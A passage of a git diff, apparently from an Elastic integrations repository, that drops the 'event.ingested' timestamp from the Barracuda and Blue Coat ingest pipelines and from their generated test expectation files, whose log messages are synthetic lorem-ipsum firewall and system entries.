queued as moles", "tags": [ "preserve_original_event" @@ -1072,9 +805,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361844147Z" - }, "message": "scan: taedi[10.17.98.243] etconsec 1563958728 1563958728 cancel ill mporinc onsectet idolo 8 55 docon SZ:mdolore SUBJ:eosquira", "tags": [ "preserve_original_event" @@ -1084,9 +814,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361845079Z" - }, "message": "reports: REPORTS (apariatu.exe) queued as lorsita", "tags": [ "preserve_original_event" @@ -1096,9 +823,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361846118Z" - }, "message": "reports: REPORTS (ever.exe) queued as tali", "tags": [ "preserve_original_event" @@ -1108,9 +832,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361847068Z" - }, "message": "inbound/pass1[mipsumqu]: tatio[10.181.247.224] onnu 1567663591 1567663591 RECV olorema aquiof ende", "tags": [ "preserve_original_event" @@ -1120,9 +841,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361848014Z" - }, "message": "scan[ugitse]: quiineav[10.235.116.121] ventore 1568898545 1568898545 deny obea emp agnaaliq est 0 73 aev SZ:inrepr SUBJ:mol", "tags": [ "preserve_original_event" @@ -1132,9 +850,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361849083Z" - }, "message": "outbound/smtp: 10.178.30.158 llit tenimad sitametc allow onproide 2 cillumd riosa Ok: queued as tNe #to#10.1.6.115", "tags": [ "preserve_original_event" @@ -1144,9 +859,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361850035Z" - }, "message": "notify/smtp[rautod]: 10.124.32.120 lapar ritati accept qui 3 mullam 4965 1.4254 meaque uid", "tags": [ "preserve_original_event" @@ -1156,9 +868,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361851031Z" - }, "message": "reports: REPORTS (ataevita.exe) queued as oremqu", "tags": [ "preserve_original_event" @@ -1168,9 +877,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.362046275Z" - }, "message": "reports: REPORTS (velitsed.exe) queued as magnaali", "tags": [ "preserve_original_event" @@ -1180,9 +886,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.362049328Z" - }, "message": "inbound/pass1: der[10.77.182.191] enbyCi 1575073317 1575073317 SCAN quameiu diduntu eiusmod itation 8 79 piciatis2460.api.host iusmodt", "tags": [ "preserve_original_event" @@ -1192,9 +895,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.362050532Z" - }, "message": "scan: iame[10.193.110.71] tiumd 1576308271 1576308271 accept loinve tanimid isnostru nofdeFi 3 5 saqu remips", "tags": [ "preserve_original_event" diff --git a/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml b/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml index 1866136294a..383b8d85377 100644 --- a/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml +++ b/packages/barracuda/data_stream/spamfirewall/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Barracuda Spam Firewall processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json index 9475ba22fe1..57b36556b23 100644 --- a/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/waf/_dev/test/pipeline/test-generated.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417884657Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" @@ -16,9 +13,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417887946Z" - }, "message": "BYPASS: Mode set to BYPASS (nbyCic).", "tags": [ "preserve_original_event" @@ -28,9 +22,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417889122Z" - }, "message": "UPDATE: [ALERT:tvolup] New attack definition version 1.1000 is available", "tags": [ "preserve_original_event" @@ -40,9 +31,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417890097Z" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "tags": [ "preserve_original_event" @@ -52,9 +40,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417891067Z" - }, "message": "STM_WRAPPER: Initializing STM.", "tags": [ "preserve_original_event" @@ -64,9 +49,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417891979Z" - }, "message": "eventmgr: Forwarding log messages to syslog host #imadm, address=10.16.222.151", "tags": [ "preserve_original_event" @@ -76,9 +58,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417892883Z" - }, "message": "PROCMON: [ALERT:eritqui] One of the RAID arrays is degrading.", "tags": [ "preserve_original_event" @@ -88,9 +67,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417893807Z" - }, "message": "BYPASS: Mode change: ccusant,epteurs", "tags": [ "preserve_original_event" @@ -100,9 +76,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417894740Z" - }, "message": "UPDATE: [ALERT:modoco] New attack definition version 1.3971 is available", "tags": [ "preserve_original_event" @@ -112,9 +85,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417895641Z" - }, "message": "STM: LB-doloreeu elillumq CreateServer =loremeum", "tags": [ "preserve_original_event" @@ -124,9 +94,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417896546Z" - }, "message": "STM: WebLog-radi ula itsed: SapCtx=rad,SapId=olupta, ididu", "tags": [ "preserve_original_event" @@ -136,9 +103,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417897693Z" - }, "message": "UPDATE: [ALERT:xcepte] New attack definition version 1.4012 is available", "tags": [ "preserve_original_event" @@ -148,9 +112,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417898673Z" - }, "message": "PROCMON: Monitoring links: lo4933", "tags": [ "preserve_original_event" @@ -160,9 +121,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417899677Z" - }, "message": "PROCMON: [ALERT:doconse] One of the RAID arrays is degrading.", "tags": [ "preserve_original_event" @@ -172,9 +130,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417900601Z" - }, "message": "CONFIG_AGENT: odite atn It is recommended to configure cookie_encryption_key_expiry atleast 7 days ahead of current time., sectet", "tags": [ "preserve_original_event" @@ -184,9 +139,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417901525Z" - }, "message": "STM: LB-tet voluptas ActiveServerOutOfBandMonitorAttr =inv", "tags": [ "preserve_original_event" @@ -196,9 +148,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417902606Z" - }, "message": "STM_WRAPPER: [ALERT:obeata] Configuration size is pexeaco which exceeds the ercitati safe limit. Please check your configuration.", "tags": [ "preserve_original_event" @@ -208,9 +157,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417903535Z" - }, "message": "BYPASS: Mode change: urEx,labo", "tags": [ "preserve_original_event" @@ -220,9 +166,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417904455Z" - }, "message": "eventmgr: Event manager startup succeeded.", "tags": [ "preserve_original_event" @@ -232,9 +175,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417905395Z" - }, "message": "STM: LB-Maloru lapariat SetServerdmin=oinBCSed", "tags": [ "preserve_original_event" @@ -244,9 +184,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417906312Z" - }, "message": "STM_WRAPPER: Successfully stopped STM.", "tags": [ "preserve_original_event" @@ -256,9 +193,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417907225Z" - }, "message": "CONFIG_AGENT: luptate Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -268,9 +202,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417908129Z" - }, "message": "STM: LB-isistena Malorum SetSapquelauda=enderit", "tags": [ "preserve_original_event" @@ -280,9 +211,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417909320Z" - }, "message": "eventmgr: Forwarding log messages to syslog host #equun, address=10.4.65.246", "tags": [ "preserve_original_event" @@ -292,9 +220,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417910284Z" - }, "message": "UPDATE: [ALERT:exer] New attack definition version 1.481 is available", "tags": [ "preserve_original_event" @@ -304,9 +229,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417911221Z" - }, "message": "eventmgr: Event manager startup succeeded.", "tags": [ "preserve_original_event" @@ -316,9 +238,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417912116Z" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "tags": [ "preserve_original_event" @@ -328,9 +247,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417913011Z" - }, "message": "CONFIG_AGENT: isnisiu aspernat Update succeeded", "tags": [ "preserve_original_event" @@ -340,9 +256,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417913918Z" - }, "message": "INSTALL: Loading the snapshot for mquel release.", "tags": [ "preserve_original_event" @@ -352,9 +265,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417914898Z" - }, "message": "INSTALL: Migrating configuration from ueporr to ptate", "tags": [ "preserve_original_event" @@ -364,9 +274,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417915807Z" - }, "message": "PROCMON: [ALERT:onsequ] enp0s7094: link is up", "tags": [ "preserve_original_event" @@ -376,9 +283,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417916724Z" - }, "message": "CONFIG_AGENT: iquip tDuisau It is recommended to configure cookie_encryption_key_expiry atleast 7 days ahead of current time., amali", "tags": [ "preserve_original_event" @@ -388,9 +292,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417917630Z" - }, "message": "eventmgr: Event manager startup succeeded.", "tags": [ "preserve_original_event" @@ -400,9 +301,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417918595Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" @@ -412,9 +310,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417919656Z" - }, "message": "STM: LB-mveniam rvelill EnableServer =iame", "tags": [ "preserve_original_event" @@ -424,9 +319,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417920572Z" - }, "message": "PROCMON: number of stm worker threads iseuf", "tags": [ "preserve_original_event" @@ -436,9 +328,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417921507Z" - }, "message": "STM: WebLog-ipiscin idolore turExce: SapCtx=modoc,SapId=mdolors, borios", "tags": [ "preserve_original_event" @@ -448,9 +337,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417922412Z" - }, "message": "STM_WRAPPER: Successfully stopped STM.", "tags": [ "preserve_original_event" @@ -460,9 +346,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417923313Z" - }, "message": "eventmgr: Forwarding log messages to syslog host #ccusa, address=10.58.33.30", "tags": [ "preserve_original_event" @@ -472,9 +355,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417924223Z" - }, "message": "PROCMON: [ALERT:uiadolo] eth321: link is up", "tags": [ "preserve_original_event" @@ -484,9 +364,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417925124Z" - }, "message": "CONFIG_AGENT: rsi ciduntut Update succeeded", "tags": [ "preserve_original_event" @@ -496,9 +373,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417926024Z" - }, "message": "CONFIG_AGENT: radipis RPC Name =isa, RPC Result: aal", "tags": [ "preserve_original_event" @@ -508,9 +382,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417926929Z" - }, "message": "INSTALL: Loading the snapshot for ris release.", "tags": [ "preserve_original_event" @@ -520,9 +391,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417927859Z" - }, "message": "CONFIG_AGENT: aliqui rcitat Update succeeded", "tags": [ "preserve_original_event" @@ -532,9 +400,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417928768Z" - }, "message": "CONFIG_AGENT: aeconse Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -544,9 +409,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417929668Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" @@ -556,9 +418,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417930593Z" - }, "message": "CONFIG_AGENT: iaecon ipexea Update succeeded", "tags": [ "preserve_original_event" @@ -568,9 +427,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417931502Z" - }, "message": "INSTALL: Migrating configuration from nulapa to cillu", "tags": [ "preserve_original_event" @@ -580,9 +436,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417932414Z" - }, "message": "PROCMON: [ALERT:ectetura] Firmware storage exceeds didun", "tags": [ "preserve_original_event" @@ -592,9 +445,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417933332Z" - }, "message": "CONFIG_AGENT: rcit nul Received put-tree command", "tags": [ "preserve_original_event" @@ -604,9 +454,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417934450Z" - }, "message": "UPDATE: [ALERT:aliquaU] New attack definition version 1.1278 is available", "tags": [ "preserve_original_event" @@ -616,9 +463,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417935408Z" - }, "message": "UPDATE: [ALERT:amei] New attack definition version 1.7778 is available", "tags": [ "preserve_original_event" @@ -628,9 +472,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417936325Z" - }, "message": "UPDATE: [ALERT:gelitse] New attack definition version 1.3018 is available", "tags": [ "preserve_original_event" @@ -640,9 +481,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417937315Z" - }, "message": "INSTALL: Migrating configuration from iceroin to qui", "tags": [ "preserve_original_event" @@ -652,9 +490,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417938223Z" - }, "message": "INSTALL: Migrating configuration from pariatu to issusc", "tags": [ "preserve_original_event" @@ -664,9 +499,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417939127Z" - }, "message": "STM: FAILOVE-roinBCSe oreet Stateful Failover Module initialized.", "tags": [ "preserve_original_event" @@ -676,9 +508,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417940042Z" - }, "message": "STM_WRAPPER: Committing UI configuration.", "tags": [ "preserve_original_event" @@ -688,9 +517,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417940940Z" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "tags": [ "preserve_original_event" @@ -700,9 +526,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417941858Z" - }, "message": "INSTALL: Migrating configuration from ernat to Ute", "tags": [ "preserve_original_event" @@ -712,9 +535,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417942773Z" - }, "message": "STM_WRAPPER: Rolling back the current database transaction. Configuration digest failed.", "tags": [ "preserve_original_event" @@ -724,9 +544,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417943672Z" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "tags": [ "preserve_original_event" @@ -736,9 +553,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417944596Z" - }, "message": "STM: RespPage-rinrepr rvelill CreateRP: Response Page mve created successfully", "tags": [ "preserve_original_event" @@ -748,9 +562,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417945487Z" - }, "message": "STM_WRAPPER: [ALERT:ineav] Configuration size is onp which exceeds the gnaaliqu safe limit. Please check your configuration.", "tags": [ "preserve_original_event" @@ -760,9 +571,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417946428Z" - }, "message": "BYPASS: Mode set to never bypass.", "tags": [ "preserve_original_event" @@ -772,9 +580,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417947361Z" - }, "message": "CONFIG_AGENT: quaea RPC Name =eetd, RPC Result: fdeFin", "tags": [ "preserve_original_event" @@ -784,9 +589,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417948270Z" - }, "message": "PROCMON: number of stm worker threads isrro", "tags": [ "preserve_original_event" @@ -796,9 +598,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417949183Z" - }, "message": "CONFIG_AGENT: tutlabo Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -808,9 +607,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417950084Z" - }, "message": "INSTALL: Loading the snapshot for pli release.", "tags": [ "preserve_original_event" @@ -820,9 +616,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417950998Z" - }, "message": "CONFIG_AGENT: erit Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -832,9 +625,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417951917Z" - }, "message": "INSTALL: Loading the snapshot for mod release.", "tags": [ "preserve_original_event" @@ -844,9 +634,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417952819Z" - }, "message": "INSTALL: Loading the snapshot for lamcolab release.", "tags": [ "preserve_original_event" @@ -856,9 +643,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417953730Z" - }, "message": "INSTALL: Migrating configuration from estlab to tis", "tags": [ "preserve_original_event" @@ -868,9 +652,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417954629Z" - }, "message": "PROCMON: [ALERT:uamqua] Firmware storage exceeds labo", "tags": [ "preserve_original_event" @@ -880,9 +661,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417955534Z" - }, "message": "INSTALL: Migrating configuration from tfugit to taspern", "tags": [ "preserve_original_event" @@ -892,9 +670,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417956683Z" - }, "message": "eventmgr: Forwarding log messages to syslog host #meiusm, address=10.48.248.158", "tags": [ "preserve_original_event" @@ -904,9 +679,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417957611Z" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "tags": [ "preserve_original_event" @@ -916,9 +688,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417958612Z" - }, "message": "PROCMON: number of stm worker threads isonula", "tags": [ "preserve_original_event" @@ -928,9 +697,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417959543Z" - }, "message": "STM: FTPSVC-nimi ilmoles Ftp proxy initialized labor", "tags": [ "preserve_original_event" @@ -940,9 +706,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417960449Z" - }, "message": "PROCMON: [ALERT:atev] One of the RAID arrays is degrading.", "tags": [ "preserve_original_event" @@ -952,9 +715,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417961358Z" - }, "message": "CONFIG_AGENT: amaliq ept Received put-tree command", "tags": [ "preserve_original_event" @@ -964,9 +724,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417962267Z" - }, "message": "BYPASS: Mode set to BYPASS (ectetura).", "tags": [ "preserve_original_event" @@ -976,9 +733,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417963173Z" - }, "message": "STM: COOKIE-icab quiado scipit = quiavolu", "tags": [ "preserve_original_event" @@ -988,9 +742,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.417964108Z" - }, "message": "BYPASS: Mode set to never bypass.", "tags": [ "preserve_original_event" @@ -1000,9 +751,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418011880Z" - }, "message": "STM: CACHE-oconseq tsedd untin SapCtx susc, SapId amr, Return Code success", "tags": [ "preserve_original_event" @@ -1012,9 +760,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418014582Z" - }, "message": "STM: aps-ddoeius tautfugi ParamProtectionClonePatterns: Old:cin, New:fugia, PatternsNode:olors", "tags": [ "preserve_original_event" @@ -1024,9 +769,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418015832Z" - }, "message": "INSTALL: Loading the snapshot for admi release.", "tags": [ "preserve_original_event" @@ -1036,9 +778,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418016924Z" - }, "message": "CONFIG_AGENT: aecons Initiating config_agent database commit phase.", "tags": [ "preserve_original_event" @@ -1048,9 +787,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418017868Z" - }, "message": "PROCMON: Monitoring links: eth801", "tags": [ "preserve_original_event" @@ -1060,9 +796,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418018819Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" @@ -1072,9 +805,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418019742Z" - }, "message": "UPDATE: [ALERT:ntoc] New attack definition version 1.7781 is available", "tags": [ "preserve_original_event" @@ -1084,9 +814,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418020760Z" - }, "message": "INSTALL: Loading the snapshot for stru release.", "tags": [ "preserve_original_event" @@ -1096,9 +823,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418021692Z" - }, "message": "PROCMON: Monitoring links: enp0s6182", "tags": [ "preserve_original_event" @@ -1108,9 +832,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418022643Z" - }, "message": "PROCMON: number of stm worker threads isumwri", "tags": [ "preserve_original_event" @@ -1120,9 +841,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418023569Z" - }, "message": "BYPASS: Mode set to never bypass.", "tags": [ "preserve_original_event" @@ -1132,9 +850,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418024577Z" - }, "message": "BYPASS: Mode set to BYPASS (eniamqu).", "tags": [ "preserve_original_event" @@ -1144,9 +859,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418025514Z" - }, "message": "UPDATE: [ALERT:tco] New attack definition version 1.6840 is available", "tags": [ "preserve_original_event" @@ -1156,9 +868,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418026469Z" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "tags": [ "preserve_original_event" @@ -1168,9 +877,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418027479Z" - }, "message": "STM_WRAPPER: Initializing STM.", "tags": [ "preserve_original_event" @@ -1180,9 +886,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418028418Z" - }, "message": "STM_WRAPPER: Successfully initialized STM.", "tags": [ "preserve_original_event" @@ -1192,9 +895,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:58:06.418029350Z" - }, "message": "PROCMON: Started monitoring", "tags": [ "preserve_original_event" diff --git a/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml b/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml index 198cbbc750f..ce09e43f41a 100644 --- a/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml +++ b/packages/barracuda/data_stream/waf/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Barracuda Web Application Firewall processors: - # ECS event.ingested - - set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json index bd21cd730d3..153fbec3830 100644 --- a/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/bluecoat/data_stream/director/_dev/test/pipeline/test-generated.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728249781Z" - }, "message": "ntpd[1001]: kernel time sync enabled utl", "tags": [ "preserve_original_event" @@ -16,9 +13,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728256159Z" - }, "message": "restorecond: : Reset file context quasiarc: liqua", "tags": [ "preserve_original_event" @@ -28,9 +22,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728257323Z" - }, "message": "auditd[5699]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -40,9 +31,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728258427Z" - }, "message": "anacron[5066]: Normal exit ehend", "tags": [ "preserve_original_event" @@ -52,9 +40,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728259453Z" - }, "message": "restorecond: : Reset file context vol: luptat", "tags": [ "preserve_original_event" @@ -64,9 +49,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728260480Z" - }, "message": "heartbeat: : \u003c\u003ceumiu.medium\u003e Processing command: accept", "tags": [ "preserve_original_event" @@ -76,9 +58,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728261505Z" - }, "message": "restorecond: : Reset file context nci: ofdeFin", "tags": [ "preserve_original_event" @@ -88,9 +67,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728262584Z" - }, "message": "auditd[6668]: Audit daemon rotating log files", "tags": [ "preserve_original_event" @@ -100,9 +76,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728263621Z" - }, "message": "anacron[1613]: Normal exit mvolu", "tags": [ "preserve_original_event" @@ -112,9 +85,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T12:01:11.728264636Z" - }, "message": "ntpd[2959]: ntpd gelit-r tatno", "tags": [ "preserve_original_event" @@ -124,9 +94,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": 